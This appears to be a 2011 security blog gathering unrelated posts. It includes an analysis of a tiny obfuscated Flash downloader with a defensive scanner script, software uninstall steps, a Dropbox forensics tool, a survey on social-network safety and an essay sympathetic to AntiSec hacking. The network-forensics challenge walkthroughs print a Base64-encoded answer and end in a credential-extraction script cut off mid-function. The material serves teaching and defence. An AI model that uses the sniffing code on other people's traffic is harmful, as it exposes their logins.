28 June 2011

[Avast blog] Flash malware that could fit a Twitter message

When analysing malware you are most likely to encounter samples which use all kinds of obfuscation in order to hide from antivirus software that protects your computer. This is also true for malware written in flash (more specifically, ActionScript). Flash is very popular among malware writers these days because many people use it on a daily basis. Sometimes, they don’t even know it’s flash that runs all the fancy stuff which takes place on their screen! Recently I came across a sample that uses a very nice trick to hide its purpose from everyone who tries to look under its hood. What is more interesting, this sample is actually smaller than 140 bytes, which means it could fit in a Twitter message! That is rather unusual for flash files, which tend to be considerably larger. But don’t worry, this is not a case of malware spreading through Twitter in its binary form. Maybe via malicious links, but that is another story.
So apart from the small file size, what is so interesting about this sample? Since it is very small, let's see the hexdump of it:

Hexdump of the original sample

Nothing unusual to see here, because we are looking at a compressed flash file (see the “CWS” header at the beginning). Okay, so let's unpack it and look again:

Hexdump of the unpacked sample

Now this is much better. We can see the uncompressed header (“SWF”) and there are some plaintext strings right at the end of the file, notably “/:$version” and “_root”. At first glance, this does not look very suspicious, but there is more. I’ve run this sample through some of our fancy tools to get a better idea of what is in the file. You might not be familiar with the structure of flash files, so let me explain it a bit. Every flash file consists of a mandatory header (that thing beginning with “SWF” or “CWS”). This header stores some information about the flash movie, like version, size and so on. Then comes a sequence of so called “tags”. A tag is a block of data which begins with a header that contains an ID (a unique number telling flash player what kind of tag this is, because there are many different tags) and the length of the tag. One of the defined tags is the “End” tag, which tells the flash player that after this tag there are no more tags (so the file ends, or at least should end). With this brief tutorial, we can have a look at the tags in this particular sample:

List of tags

As you can see, the first tag is reported as “Unknown”. Because of backwards compatibility, flash simply skips any tags that it does not recognize, so we can skip this one too. Out of the remaining tags, the only interesting ones for us are the DoAction tag and the ShowFrame tag. The ShowFrame is important because it actually makes Flash Player execute all actions defined before it (simplified a bit). The DoAction tag is where all the magic happens. This tag contains ActionScript code, which can do various stuff ranging from a simple puzzle game to a video player. Because there is nowhere else to look for malicious code, let's try our luck and dig deeper into this particular tag. A quick disassembly reveals some interesting stuff:

Code in the DoAction tag

Ooops, what is that? We can immediately tell there is something fishy about this code. First of all, there are numerous instructions that are not known. Better yet, there is the ActionPush instruction which is used to push data on the ActionScript Virtual Machine stack. In this case, it pushes the data from a so called “constant pool”, which is just a fancy name for an array of strings. But where is this array defined? An ActionConstantPool instruction is used to define this array, but it is not in the code above! Does it mean this code will not work? Of course not. In order to reveal the secrets of it, we must look a bit back. In the list of tags we see that the DoAction tag should be 103 bytes long, but the largest offset in our instruction list is only 47! The sequence of bytes at that spot in the file is FC FF 88, which “translates” into an action of code FC (not defined) and length 0x88FF. Since the file is only 131 bytes long, this is clearly bullshit. But don't worry, let's patch the file a bit to remove this obstacle and see what happens:

Code in the DoAction tag - second attempt

Now that is interesting! An ActionConstantPool sitting right after the “obstacle” we just removed! There was actually another hint that some useful data will be at the end of the tag – the first instruction of all is an ActionJump which jumps in the code by the given offset. The offset in this case is 0x2C, so the new address will be 0x31 (since the jump action is 5 bytes long and we need to add those too). All these tricks are here to defeat disassemblers or any kind of static analysis. So what does the sample do? When the code runs, the first thing it does is jump forward to the constant pool definition and then jump a bit backwards, right at offset 0x0A where the ActionPush is. Remember that before we said this action is invalid since there is no constant pool? That's no longer true, so all is well and the code goes on. It's pretty simple now to get the resulting code; it will be something like this:

Final code

The sample simply checks the version of your flash player and opens an appropriate flash movie, which can contain exploits that work in that particular version of flash player. So it's actually a downloader, something that opens doors into your computer and lets the bad things in. All this in just slightly over 130 bytes of flash.
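The tag walk and action walk described above are easy to automate, and automating them is what catches this trick: a record whose declared length runs past its tag cannot be legitimate. The Python below is an added example written for this page, not the Avast author's tooling and not the sample itself. It inflates a CWS file, walks the tag records, walks the action records inside each DoAction tag, and flags any record that overruns its container (the FC FF 88 case). The tiny SWF it builds for the demonstration is constructed; the tag codes, the RECORDHEADER layout and the "actions at or above 0x80 carry a UI16 length" rule come from the SWF and ActionScript specifications.

```python
import struct
import zlib

# Tag and action codes from the SWF / ActionScript specs (only the subset the post talks about).
TAG_NAMES = {0: "End", 1: "ShowFrame", 9: "SetBackgroundColor", 12: "DoAction"}
ACTION_NAMES = {0x00: "ActionEnd", 0x88: "ActionConstantPool", 0x96: "ActionPush", 0x99: "ActionJump"}


def decompress_swf(data):
    """CWS files carry a zlib stream after the 8-byte header; FWS files are already flat."""
    if data[:3] == b"CWS":
        return b"FWS" + data[3:8] + zlib.decompress(data[8:])
    if data[:3] == b"FWS":
        return data
    raise ValueError("not an SWF file")


def header_length(data):
    """8 fixed bytes + RECT (5-bit Nbits, then 4*Nbits bits, byte padded) + UI16 frame rate + UI16 frame count."""
    nbits = data[8] >> 3
    return 8 + (5 + 4 * nbits + 7) // 8 + 4


def walk_tags(data):
    """List the tag records; stop at End or at a tag whose declared length runs past the file."""
    data = decompress_swf(data)
    pos, tags = header_length(data), []
    while pos + 2 <= len(data):
        (code_and_len,) = struct.unpack_from("<H", data, pos)   # upper 10 bits code, lower 6 bits length
        code, length, pos = code_and_len >> 6, code_and_len & 0x3F, pos + 2
        if length == 0x3F:                                       # long form: a 32-bit length follows
            (length,) = struct.unpack_from("<I", data, pos)
            pos += 4
        tag = {"code": code, "name": TAG_NAMES.get(code, "Unknown"), "offset": pos,
               "length": length, "truncated": pos + length > len(data)}
        tags.append(tag)
        if tag["truncated"] or code == 0:
            break
        pos += length
    return tags


def walk_actions(body):
    """Walk a DoAction body; flag any record whose header or payload overruns the tag."""
    pos, actions = 0, []
    while pos < len(body):
        code, hdr, length = body[pos], 1, 0
        if code >= 0x80:                                         # these actions carry a UI16 length
            if pos + 3 > len(body):
                actions.append({"offset": pos, "code": code, "name": ACTION_NAMES.get(code, "Unknown"),
                                "length": None, "bad": True})
                break
            (length,) = struct.unpack_from("<H", body, pos + 1)
            hdr = 3
        bad = pos + hdr + length > len(body)
        actions.append({"offset": pos, "code": code, "name": ACTION_NAMES.get(code, "Unknown"),
                        "length": length, "bad": bad})
        if bad or code == 0:
            break
        pos += hdr + length
    return actions


def suspicious_actions(data):
    """(tag offset, action offset, action code) for every action record that overruns its DoAction tag."""
    data = decompress_swf(data)
    hits = []
    for tag in walk_tags(data):
        if tag["name"] == "DoAction" and not tag["truncated"]:
            body = data[tag["offset"]:tag["offset"] + tag["length"]]
            hits += [(tag["offset"], a["offset"], a["code"]) for a in walk_actions(body) if a["bad"]]
    return hits


def _tag(code, body):
    return struct.pack("<H", (code << 6) | len(body)) + body


def build_sample_swf(action_body, compress=False):
    """Constructed minimal SWF for the demonstration (not the sample from the post)."""
    rect = b"\x00"                                        # Nbits = 0: a zero-size stage in one byte
    payload = rect + struct.pack("<HH", 12 << 8, 1)       # 12 fps (8.8 fixed point), one frame
    payload += _tag(9, b"\xff\xff\xff") + _tag(12, action_body) + _tag(1, b"") + _tag(0, b"")
    flat = b"FWS" + bytes([8]) + struct.pack("<I", 8 + len(payload)) + payload
    return (b"CWS" + flat[3:8] + zlib.compress(flat[8:])) if compress else flat


if __name__ == "__main__":
    # ActionPush "x", then a bogus action 0xFC claiming 0x88FF bytes, as in the post.
    crafted = build_sample_swf(b"\x96\x03\x00\x00\x78\x00\xfc\xff\x88\x00\x00\x00\x00", compress=True)
    for t in walk_tags(crafted):
        print(f"{t['name']:<20} offset={t['offset']} length={t['length']}")
    print("overrunning actions:", suspicious_actions(crafted))
```

A disassembler that trusts the declared length stops exactly where the author's did; a scanner that reports the overrun instead has a cheap, high-signal indicator that the DoAction bytes after that point deserve a look.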



Source: https://blog.avast.com/2011/06/28/flash-malware-that-could-fit-a-twitter-message/

27 June 2011

[Programming] Microsoft Visual Studio 2005


  1. Go to the Control Panel and launch Add/Remove Programs
  2. Remove "Microsoft SQL Server 2005 Express Edition"
  3. Remove "Microsoft SQL Server 2005 Tools Express Edition"
  4. Remove "Microsoft SQL Native Client"
  5. Remove "Microsoft Visual Studio 64bit Prerequisites Beta" (This step is needed only if Visual Studio is installed on a 64-bit machine)
  6. Remove "Microsoft Visual Studio Tools for Office System 2005 Runtime Language Pack" (This step is not needed if you have only the English Edition)
  7. Remove "Microsoft Visual Studio Tools for Office System 2005 Runtime Beta"
  8. Remove "Microsoft Device Emulator 1.0 Beta"
  9. Remove "Microsoft .NET Compact Framework 2.0 Beta"
  10. Remove "Microsoft .NET Compact Framework 1.0"
  11. Remove "Microsoft Visual Studio 2005 Professional" or other related IDE installs such as (Visual Studio Professional/Standard/Enterprise Architect/Team Suite, etc.)
  12. Remove "Microsoft Document Explorer 2005 Language Pack" (This step is not needed if you have only the English Edition)
  13. Remove "Microsoft Document Explorer 2005" (This step is needed for post-Beta2 builds)
  14. Remove "Microsoft SQL Mobile 2005 Development Tools"
  15. Remove "Microsoft 64-bit SDK" (This step is only needed if Visual Studio is installed on a 64-bit machine)
  16. Remove "Microsoft Visual Studio 2005 Remote Debugger (x64)" (This step is needed only if Visual Studio is installed on a 64-bit machine)
  17. Remove "Microsoft MDAC 2.8 SP1" (This step is needed only if you are running Windows 2000)
  18. Remove "Microsoft MSXML 6 SDK and Parser"
  19. Remove "Microsoft Visual J# .NET Redistributable 2.0 Beta Language Pack" (This step is not needed if you have only the English Edition)
  20. Remove "Microsoft Visual J# Redistributable Package 2.0 Beta"
  21. Ensure all Visual Studio 2005 products have been removed from your system
  22. Remove "Microsoft .NET Framework 2.0 Beta Language pack" (This step is not needed if you have only the English Edition)
  23. Remove "Microsoft .NET Framework 2.0 Beta"

Notes:
  1. If you see an error removing J# .NET Redistributable Package 2.0 from Add/Remove Programs, please run "msiexec /x {9046F10C-F5E7-4871-BED9-8288F19C70DF}" from a command line window
  2. If you see an error removing .NET Framework 2.0 from Add/Remove Programs, please run "msiexec /x {71F8EFBF-09AF-418D-91F1-52707CDFA274}" from a command line window
To download a tool that may help you clean your computer in preparation for installing Visual Studio 2005, please visit this link. Please Note: This tool is not supported or thoroughly tested by Microsoft. This is a free tool and you should use it at your own risk. No warranty or support is provided, expressed or implied.



System Requirements for Installing Visual Studio 2005

Processor
  Minimum:
  • 600 megahertz (MHz) Pentium processor
  Recommended:
  • 1 gigahertz (GHz) Pentium processor recommended

Operating System
  Visual Studio 2005 can be installed on any of the following systems:
  • Microsoft® Windows® 2000 Professional SP4
  • Microsoft® Windows® 2000 Server SP4
  • Microsoft® Windows® 2000 Advanced Server SP4
  • Microsoft® Windows® 2000 Datacenter Server SP4
  • Microsoft® Windows® XP Professional x64 Edition (WOW)
  • Microsoft® Windows® XP Professional SP2
  • Microsoft® Windows® XP Home Edition SP2
  • Microsoft® Windows® XP Media Center Edition 2002 SP2
  • Microsoft® Windows® XP Media Center Edition 2004 SP2
  • Microsoft® Windows® XP Media Center Edition 2005
  • Microsoft® Windows® XP Tablet PC Edition SP2
  • Microsoft® Windows Server™ 2003, Standard Edition SP1
  • Microsoft® Windows Server™ 2003, Enterprise Edition SP1
  • Microsoft® Windows Server™ 2003, Datacenter Edition SP1
  • Microsoft® Windows Server™ 2003, Web Edition SP1
  • Microsoft® Windows Server™ 2003, Standard x64 Edition (WOW)
  • Microsoft® Windows Server™ 2003, Enterprise x64 Edition (WOW)
  • Microsoft® Windows Server™ 2003, Datacenter x64 Edition (WOW)
  • Microsoft® Windows Server™ 2003 R2, Standard Edition
  • Microsoft® Windows Server™ 2003 R2, Standard x64 Edition (WOW)
  • Microsoft® Windows Server™ 2003 R2, Enterprise Edition
  • Microsoft® Windows Server™ 2003 R2, Enterprise x64 Edition (WOW)
  • Microsoft® Windows Server™ 2003 R2, Datacenter Edition
  • Microsoft® Windows Server™ 2003 R2, Datacenter x64 Edition (WOW)
  Installation of Visual Studio 2005 on the Intel Itanium (IA64) is not supported.

RAM
  Minimum:
  • 192 megabytes (MB)
  Recommended:
  • 256 MB

Hard Disk
  Without MSDN:
  • 2 GB of available space required on installation drive
  • 1 GB of available space required on system drive
  With MSDN:
  • 3.8 GB of available space required on installation drive with a full MSDN install, or 2.8 GB of available space required on installation drive with a default MSDN install.
  • 1 GB of available space required on system drive

CD or DVD Drive
  Not required

Display
  Minimum:
  • 800 x 600, 256 colors
  Recommended:
  • 1024 x 768 High Color (16-bit)

Mouse
  Microsoft mouse or compatible pointing device


25 June 2011

[RAT] No pain, no gain

It is easy to overlook the most important person
HASTY
No benefactor
Feelings
:))

[Forensic Tool] Dropbox Reader™

Dropbox Reader consists of six Python scripts:

  • read_config script outputs the contents of the Dropbox config.db file in human-readable form. This includes the user's registered e-mail address and Dropbox identifier, software version information, and a list of the most-recently-changed files.
  • read_filecache_config script outputs configuration information from the Dropbox filecache.db file. This includes information about shared directories that are attached to the user's Dropbox account.
  • read_filejournal script outputs information about Dropbox synchronized files stored in the filecache.db file. This includes local and server-side metadata and a list of block hashes for each Dropbox-synchronized file.
  • read_sigstore script outputs information from the Dropbox sigstore.db file, which is an additional source of block hashes.
  • hash_blocks script produces a block hash list for any file. This block hash list can be compared to the block hashes from read_filejournal or read_sigstore.
  • dropbox_contains_file script hashes one or more files (as per hash_blocks) and compares the resulting block hash list to the files listed in filecache.db (as per read_filejournal) and reports whether the files are partially or exactly the same as any Dropbox-synchronized files.
Download: http://download.atc-nycorp.com/utilities/DropboxReader_1.0.zip
Source: http://www.cybermarshal.com/index.php/cyber-marshal-utilities/dropbox-reader
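To make the hash_blocks / dropbox_contains_file comparison concrete, here is an added Python example; it is not part of Dropbox Reader and not Dropbox's own code. It splits data into fixed-size blocks, hashes each block, and reports whether a candidate file is an exact or partial match for entries in a synced-file journal (what read_filejournal would list). The 4 MiB block size and the SHA-256 hex digest are assumptions made for the illustration; the page does not describe the hash format actually stored in filecache.db, so match this against the real tool's output before relying on it.

```python
import hashlib

# Assumption for this illustration: Dropbox-style 4 MiB blocks. Parameterised so the
# comparison logic can be exercised with tiny inputs.
BLOCK_SIZE = 4 * 1024 * 1024


def block_hashes(data, block_size=BLOCK_SIZE):
    """Hash a byte string block by block, the way hash_blocks does for a file (SHA-256 hex assumed)."""
    return [hashlib.sha256(data[i:i + block_size]).hexdigest() for i in range(0, len(data), block_size)]


def compare_block_lists(candidate, known):
    """Verdicts in the dropbox_contains_file sense: 'exact', 'partial' (some blocks shared) or 'none'."""
    if candidate == known:
        return "exact"
    if set(candidate) & set(known):
        return "partial"
    return "none"


def contains_file(candidate_data, journal, block_size=BLOCK_SIZE):
    """journal maps a synced path to its block hash list; returns only the paths that match somewhere."""
    hashes = block_hashes(candidate_data, block_size)
    verdicts = {path: compare_block_lists(hashes, known) for path, known in journal.items()}
    return {path: v for path, v in verdicts.items() if v != "none"}


if __name__ == "__main__":
    # Constructed journal: two "synced" files, hashed with an 8-byte block size for the demo.
    synced_a = b"A" * 16 + b"B" * 8
    journal = {"/Dropbox/a.bin": block_hashes(synced_a, 8), "/Dropbox/c.bin": block_hashes(b"C" * 8, 8)}
    print(contains_file(synced_a, journal, 8))                  # exact match
    print(contains_file(b"A" * 8 + b"Z" * 8, journal, 8))       # shares one block: partial
    print(contains_file(b"Q" * 8, journal, 8))                  # nothing in common
```

Partial matches are the forensically interesting case: a file that was edited after syncing, or a different file that shares content, still shares blocks with what the journal recorded.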

23 June 2011

[ESET] The Social Networking/Cybersafety Disconnect

A recent survey commissioned by ESET and conducted online by Harris Interactive from May 31-June 2, 2011 among 2,027 U.S. adults 18+ found a startling disconnect between user concerns about privacy and security and their actions on social networking sites.
To start, the study found that 69% of online social networking account owners are concerned about security on social networking sites, yet 1/3 of them have never changed their passwords for their social networking accounts and another 15% last changed their password more than one year ago.

Moreover, the survey revealed that one in ten online Americans with social networking accounts have reported that an unknown party gained unauthorized access to their social networking account to spread malicious links and comments. This is particularly alarming since unauthorized access can threaten account owner’s cybersecurity as well as that of their contacts—we’ve seen countless examples, including recent scams around the death of Osama Bin Laden.

The survey also found that 67% of account owners claimed that they were concerned about privacy issues, yet 55% of the account owners update their privacy settings less often than once every six months, if ever. This can be problematic. For example, Facebook makes it extremely difficult to know when you need to change settings because they virtually never advise users when they are making changes that may affect user privacy.

While 69% of account owners were concerned about security and 67% expressed concern about privacy there were other significant concerns reported as well.
• 37% were concerned about someone creating a fake account in their name.
• 95% of social networking account owners accept friend/follower/connection requests always or sometimes.
• 71 percent of social networking account owners are concerned that their personal information entered on social networking sites may be sold or shared without their knowledge for profit.
• 17% were concerned about their children using social networking sites.

So, what can you do to secure yourself and your contacts on social networks?
A common misperception seems to have many users believing that social networking safety and privacy is entirely outside of their control. This is not the case—you can easily improve your online security if you follow these simple guidelines:
#1: Be smart about passwords.
How important is it to change your social networking password on a regular basis and at what interval should you change it? This is actually a subset of the question of how often should you change passwords in general. The answer to this question depends upon a few factors.
Do you use the same password for your multiple social networking accounts, email accounts, and other online services? If you answer yes to this, then about once every 5 minutes is the optimal interval for changing your password. When you use the same password everywhere it only takes one Sony-style mistake to compromise all of your accounts. Remember, your passwords are on the Internet, and they are not entirely under your control. Is your password a word in any language? A number such as 12345? If so, then perhaps an interval of once every 10 minutes is appropriate. To put it simply, you can’t change your password often enough if you are using a poor password. For some tips on using good passwords I recommend that you refer to ESET Researcher Paul Laudanski’s blog “No chocolates for my passwords please!”
Assuming a good password and no significant enemies, I am unaware of a scientific formula for the optimal period for password changes. In general I would expect for a service like Facebook, every three to six months will be sufficient, yet the survey found that 70% of social networking account owners have not changed their password within the last 90 days. Events like breaking up with a vindictive partner, finding that your computer or smartphone has been compromised, etc. would tend to mandate a password change sooner rather than later.
#2: Know your options when it comes to privacy, and check back often.
Facebook may report to the media that they are making a change, but often the change is gradually rolled out and secretly slipped past users. Facebook appears to deliberately use this approach to drive adoption of “features” they fear users will find nefarious. The reality is that with Facebook you probably should be checking your privacy settings every couple of weeks if you want a chance to keep on top of what Facebook may have changed in your account. Once again, Paul Laudanski has an excellent blog about Facebook privacy settings with best practices and tips to keep Facebook users safe. Don’t be fooled though, Facebook privacy has never been “set and forget” and is not likely to be anytime soon. As hard as you work to control your privacy, Facebook’s marketing department is working twice as hard to find new ways to share your data without informed consent.
#3: Know who your real “friends” are.
Be sure that anyone whose “friendship” or connection you accept is someone you know and trust. For the 11% of social networking account owners that indicated concern about the number of friends/followers/contacts they have, all I can say is that it is your choice and you have to make your own decisions. We can provide you with advice and guidance, but we can’t and won’t tell you who to associate with.
#4: When in doubt, seek help from outside resources.
For those of you concerned with your children’s use of social networking sites, I would highly recommend a visit to http://www.safetynetcc.org/, a collaborative cyber safety education program of the San Diego Internet Crimes Against Children Task Force and the San Diego Police Foundation.
Methodology
This survey was conducted online within the United States by Harris Interactive on behalf of Schwartz Communications from May 31-June 2, 2011 among 2,027 adults ages 18 and older, of whom 1,476 have social networking accounts. This online survey is not based on a probability sample and therefore no estimate of theoretical sampling error can be calculated. For complete survey methodology, including weighting variables, please email us here.
Randy Abrams
Director of Technical Education
Cyber Threat Analysis Center
ESET North America



Source: http://blog.eset.com/2011/06/22/the-social-networkingcybersafety-disconnect

[RAT] Lulz + Anonymous = AntiSec

This is an exhortation: think beneath the surface of what you are told. The subject is Lulz Security and the Anonymous group. They have aligned themselves in the AntiSec operation against the Establishment; but before simply condemning them I would like us all to consider the issues.
Let’s look at some of the few facts we know. Firstly, there is no evidence of what most people consider to be criminal behaviour: theft for personal gain or simple wanton destruction (it is criminal behaviour simply because what they do is against the law). Rather do they consider themselves engaged in political activism on the internet, although Lulz also claims that it is just plain ‘fun’.
AntiSec is aimed at both the government establishment and what Lulz calls the whitehat security industry:
Operation Anti-Security is in effect. Join the fleet and tear the government and whitehat peons limb from limb – #antisec winds are strong.
Government I understand. But why wage war against the security industry? Lulz offers this:
Your tax money is being used to pay for things to not be secured so that people like us can take what you expect to be kept inaccessible.
Is that a pop against the billions of tax dollars and pounds used by government to store our personal details online? Or is it a pop against the security industry that uses additional tax money to maintain, but fails to maintain, the security of that data online? Consider the following from a press release put out by Idappcom (a whitehat security company):
Yesterday, the Serious Organised Crime Agency (Soca) was subject to a distributed denial of service (DDoS) attack designed to bring down its website. Today LulzSec say they have ‘blissfully obtained records of every single citizen who gave their records to the security-illiterate UK government for the 2011 census’.
But Lulz says:
Just saw the pastebin of the UK census hack. That wasn’t us – don’t believe fake LulzSec releases unless we put out a tweet first.
Idappcom added:
The attacks of yesterday were not damaging but a Twitter post today has threatened that future attacks will be.
I’ve looked. Believe me I have looked. But I cannot find a Lulz tweet that says anything like this. The nearest I can find is this:
DDoS is of course our least powerful and most abundant ammunition. Government hacking is taking place right now behind the scenes. #AntiSec
But that’s not a threat of damage, it’s a claim that they are breaking into sites and not just taking them down.
So some aspects of government and industry (and I have to add, media) are playing up the threat from Lulz. Why? Well, fear sells. If we are afraid of all hacking activity we will more likely accept the loss of personal liberty that governments demand in the name of security for purposes of control. And if we are afraid of hackers we will more likely buy security products from the whitehat industry. And the more afraid we are, the more we will buy from both government and industry.
So, sadly, I would suggest that the methods chosen for AntiSec will be counterproductive to the ends: it plays into the hands of the establishment they attack. But this is what I want you to ask yourselves: what else can the politically conscientious youth of today do? It’s not like my day back in the ’60s and ’70s. We’re not allowed to protest peacefully today: we get illegally corralled, beaten, filmed, and stored. So what I want you to ask yourselves is this: is AntiSec today’s version of taking to the streets in the way that my generation did all those years ago? And do they not have a point? Consider the illegal wars that our governments engage in. Think of the lies they tell us. Think of the way the banks control us through control of the (and usually our) money. Think of the way in which dissent is quashed. Think of Dr David Kelly. Think of the war against terror that fills the coffers of our munitions industries but has made the world less safe for everyone. I’d like to suggest this: in a few years time, AntiSec will be part of our university sociology and psychology courses. Is AntiSec the inevitable result of a government divorced from its people: discuss.


Source: http://kevtownsend.wordpress.com

22 June 2011

[Programming] C#

[Securityoverride.com] Forensics Level 4




The following is a wireshark trace file of an HTTP authentication forensics4.rar.
Find the username and password of the HTTP authentication and enter it below to receive credit.
Username:
Password:

The server IP is 192.168.0.1 and client IP is 192.168.0.3
Wireshark is a network protocol analyzer for Unix and Windows and can be downloaded here.

Let's get started


The takeaway is
In the context of an HTTP transaction, the basic access authentication is a method designed to allow a web browser, or other client program, to provide credentials – in the form of a user name and password – when making a request.


Before transmission, the user name is appended with a colon and concatenated with the password. The resulting string is encoded with the Base64 algorithm. For example, given the user name Aladdin and password open sesame, the string Aladdin:open sesame is Base64 encoded, resulting in QWxhZGRpbjpvcGVuIHNlc2FtZQ==. The Base64-encoded string is transmitted and decoded by the receiver, resulting in the colon-separated user name and password string.

While encoding the user name and password with the Base64 algorithm typically makes them unreadable by the naked eye, they are as easily decoded as they are encoded. Security is not the intent of the encoding step. Rather, the intent of the encoding is to encode non-HTTP-compatible characters that may be in the user name or password into those that are HTTP-compatible.

Security Concerns
Although the scheme is easily implemented, it relies on the assumption that the connection between the client and server computers is secure and can be trusted. Specifically, if SSL/TLS is not used, then the credentials are passed as plaintext and could be intercepted easily. The scheme also provides no protection for the information passed back from the server.


Existing browsers retain authentication information until the tab or browser is closed or the user clears the history. [1] HTTP does not provide a method for a server to direct clients to discard these cached credentials. This means that there is no effective way for a server to "log out" the user without closing the browser. This is a significant defect that requires browser manufacturers to support a 'logout' user interface element or API available to JavaScript, further extensions to HTTP, or use of existing alternative techniques such as retrieving the page over SSL/TLS with an unguessable string in the URL.
Don't ask me :))
Or don't ask why that is Base64... these really are just typical, simple examples. It's mainly about practising skills.


[Securityoverride.com] Forensics Level 3


The following is a wireshark trace file of an SMTP authentication forensics3.rar.
Find the username and password of the SMTP authentication and enter it below to receive credit.
Username:
Password:

The server IP is 192.168.0.1 and client IP is 192.168.0.3
Wireshark is a network protocol analyzer for Unix and Windows and can be downloaded here

To solve level 3... you need to learn a bit about SMTP Authentication


Okay, after doing the research... let's begin


9    0.430619    192.168.0.1    192.168.0.3    SMTP    S: 334 VXNlcm5hbWU6
10    0.430619    192.168.0.3    192.168.0.1    SMTP    C: QXVkaQ==
11    0.430619    192.168.0.1    192.168.0.3    SMTP    S: 334 UGFzc3dvcmQ6
12    0.430619    192.168.0.3    192.168.0.1    SMTP    C: MTIzNGFk

Give it a try :))
The takeaway is

Extended SMTP (ESMTP), sometimes referred to as Enhanced SMTP, is a definition of protocol extensions to the Simple Mail Transfer Protocol standard. The extension format was defined in IETF publication RFC 1869 (1995) which established a general structure for all existing and future extensions.

The SMTP-AUTH extension provides an access control mechanism. It consists of an authentication step through which the client effectively logs in to the mail server during the process of sending mail.

This LOGIN authentication method encodes the user's name and password using the Base64 encoding scheme. Because decoding a Base64-encoded string is trivial, LOGIN is not considered a secure authentication method and should be avoided.

[Securityoverride.com] Forensics Level 2




The following is a wireshark trace file of an SMTP transfer forensics2.rar.
Find the senders email address and the recipients email address of the SMTP transfer and enter it below to receive credit.
Sender:
Recipient:

The server IP is 192.168.0.1 and client IP is 192.168.0.3
Wireshark is a network protocol analyzer for Unix and Windows and can be downloaded here.






The point:


SMTP is a core Internet protocol used to transfer e-mail messages between servers (first defined in RFC 821 in 1982). This contrasts with protocols such as POP3 and IMAP, which are used by messaging clients to retrieve e-mail.

SMTP servers look at the destination address of a message and contact the target mail server directly. Of course, this means the Domain Name Service (DNS) has to be configured correctly otherwise mail could be handed to the wrong server - potentially a big problem because, unless you have encrypted your messages, your e-mail will be in plain text!

SMTP was designed to be a reliable message delivery system. Reliable in this case means that a message handled by SMTP is intended to get to its destination or generate an error message accordingly. This is not the same as a guaranteed delivery service, it just does its best. To guarantee delivery requires all sorts of data exchanges that would add considerable communications overhead that would be pointless for everyday purposes.

SMTP communications are transported by TCP to ensure reliable end-to-end transport. RFC 822 defines the format of SMTP messages.

RFC 822 is a straightforward specification that breaks the message into headers and bodies separated by a blank line. In the header are a number of keywords and values that define the sending date, sender's address, where replies should go, and so on, while the body contains the data.

[Securityoverride.com] Forensics Level 1

Sitting down to practise a bit of forensics :))
1. Register an account at http://securityoverride.com
2. Check your mail and let's try it out

Level 1:



The following is a wireshark trace file of an FTP authentication forensics1.rar.
Find the username and password of the FTP authentication and enter it below to receive credit.
Username:

Password:
The server IP is 192.168.0.1 and client IP is 192.168.0.3
Wireshark is a network protocol analyzer for Unix and Windows and can be downloaded here.
===================================================================
Okay...
Download Forensic1.rar and have a look..........




The bottom line is:

The original FTP specification is an inherently unsecure method of transferring files because there is no method specified for transferring data in an encrypted fashion. This means that under most network configurations, user names, passwords, FTP commands and transferred files can be captured by anyone on the same network using a packet sniffer. This is a problem common to many Internet protocol specifications written prior to the creation of SSL, such as HTTP, SMTP and Telnet. The common solution to this problem is to use either SFTP (SSH File Transfer Protocol), or FTPS (FTP over SSL), which adds SSL or TLS encryption to FTP as specified in RFC 4217.
There are a few smaller matters here such as the port, the mechanism, etc. Google them yourself... :)
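The four levels above share one lesson: FTP USER/PASS, SMTP AUTH LOGIN and HTTP Basic all hand the credentials to anyone on the path, either in the clear or in trivially reversible Base64, and the SMTP envelope (MAIL FROM / RCPT TO) is just as visible. As an added example, not from securityoverride.com and not the challenge files, the following Python walks a "Follow TCP Stream" style transcript and extracts what a passive observer sees. The transcripts are constructed: the HTTP one uses the RFC's Aladdin example from the text above, the SMTP and FTP accounts are made up. Run over an export of your own traffic, it is a quick check that a service has stopped accepting unencrypted logins.

```python
import base64
import re

# Constructed transcripts in "C:"/"S:" follow-stream style (sample data, not the challenge captures).
SAMPLE_STREAMS = {
    "ftp": [
        "S: 220 FTP server ready",
        "C: USER bob",
        "S: 331 Password required for bob",
        "C: PASS hunter2",
        "S: 230 User bob logged in",
    ],
    "smtp": [
        "S: 220 mail.example.test ESMTP",
        "C: EHLO client.example.test",
        "S: 250-AUTH LOGIN PLAIN",
        "C: AUTH LOGIN",
        "S: 334 VXNlcm5hbWU6",            # base64("Username:")
        "C: YWxpY2U=",                     # base64("alice")
        "S: 334 UGFzc3dvcmQ6",            # base64("Password:")
        "C: czNjcmV0",                     # base64("s3cret")
        "S: 235 Authentication successful",
        "C: MAIL FROM:<alice@example.test>",
        "C: RCPT TO:<bob@example.test>",
    ],
    "http": [
        "C: GET /private/ HTTP/1.1",
        "C: Host: www.example.test",
        "C: Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",   # the RFC example from the text
        "S: HTTP/1.1 200 OK",
    ],
}


def _b64(text):
    """Decode Base64 to str, or None when the token is not valid Base64 / UTF-8."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_ftp(lines):
    """FTP sends USER and PASS as plain text commands."""
    user = password = None
    for line in lines:
        if line.startswith("C: USER "):
            user = line[len("C: USER "):].strip()
        elif line.startswith("C: PASS "):
            password = line[len("C: PASS "):].strip()
    return {"protocol": "FTP", "user": user, "password": password} if user else None


def extract_smtp_login(lines):
    """AUTH LOGIN: the server's 334 prompts are base64 'Username:'/'Password:', the client answers in base64."""
    creds = {"protocol": "SMTP AUTH LOGIN", "user": None, "password": None, "mail_from": None, "rcpt_to": []}
    expect = None
    for line in lines:
        if line.startswith("S: 334 "):
            prompt = (_b64(line[7:].strip()) or "").lower()
            expect = "user" if prompt.startswith("username") else "password" if prompt.startswith("password") else None
        elif line.startswith("C: ") and expect:
            creds[expect] = _b64(line[3:].strip())
            expect = None
        elif line.upper().startswith("C: MAIL FROM:"):
            creds["mail_from"] = re.search(r"<([^>]*)>", line).group(1)
        elif line.upper().startswith("C: RCPT TO:"):
            creds["rcpt_to"].append(re.search(r"<([^>]*)>", line).group(1))
    return creds


def extract_http_basic(lines):
    """HTTP Basic: base64(user:password) in the Authorization header."""
    for line in lines:
        match = re.match(r"C: Authorization:\s*Basic\s+(\S+)", line, re.I)
        if match:
            decoded = _b64(match.group(1))
            if decoded and ":" in decoded:
                user, password = decoded.split(":", 1)
                return {"protocol": "HTTP Basic", "user": user, "password": password}
    return None


def audit_streams(streams):
    """Return every credential set recoverable from the given transcripts."""
    extractors = {"ftp": extract_ftp, "smtp": extract_smtp_login, "http": extract_http_basic}
    findings = []
    for proto, lines in streams.items():
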